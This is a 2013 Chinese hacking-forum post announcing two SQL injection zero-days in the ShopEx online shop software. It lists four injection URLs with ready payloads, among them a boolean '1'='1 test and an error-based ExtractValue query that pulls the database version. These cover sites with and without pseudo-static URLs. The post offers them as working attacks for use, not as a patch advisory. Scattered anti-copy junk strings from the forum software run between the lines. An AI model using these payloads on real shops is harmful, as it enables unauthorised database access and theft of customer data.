中国网络渗透测试联盟
标题:
shopex通杀注入0day漏洞两处
[打印本页]
作者:
admin
时间:
2013-2-19 08:31
标题:
shopex通杀注入0day漏洞两处
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
) t6 r8 x" v1 o; c/ K4 u h
. D& f% e# o! P# B+ k7 T9 R
好吧,我扯远了~~
5 [3 q% y- E( ^ b
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
9 I4 l( F4 F" u* M( n
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
2 B! D# O2 S0 [
: I7 f1 ]5 I1 t. K% }' B% u. B1 I8 x
http://www.x.cn/index.php?comment-822
′/**/and/**/’1′=’1-ask-commentlist.html
6 b+ L) y. o" i+ O
d' T9 Z3 p/ g$ B
http://www.x.com/comment-8967
′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
! R# ]# c- P' r* n
! a, u; n( {+ l9 F+ @& _5 w" l
http://www.x.cn/index.php?comment-822
′/**/and/**/’1′=’1-ask-commentlist.html
$ y* i4 Q+ e0 a* q( d; y, t
( ]* \6 M* x& O# }
http://demo.x.com.cn/485/index.php?comment-190
′/**/and/**/’1′=’1-ask-commentlist.html
" H I9 j- P c0 G! z' R! @
; q; r. x- S. I4 A- l9 D
& x5 K) e J3 W7 u9 ^* t* B
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
! @' v5 h- q+ r6 G0 @/ F, ]
如何注入就不多说了,10多年的东西了…不会也会了…
4 y+ l8 }8 Q. Y+ K& m5 j0 P4 [
' p5 x1 @8 g+ J( R2 C2 d, u% T, F
4 t: P! u9 S1 M9 L
# D$ P8 q1 Z& C. p* q+ S4 Q7 n
$ k0 X8 Q9 t6 x- c& s! q; `
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2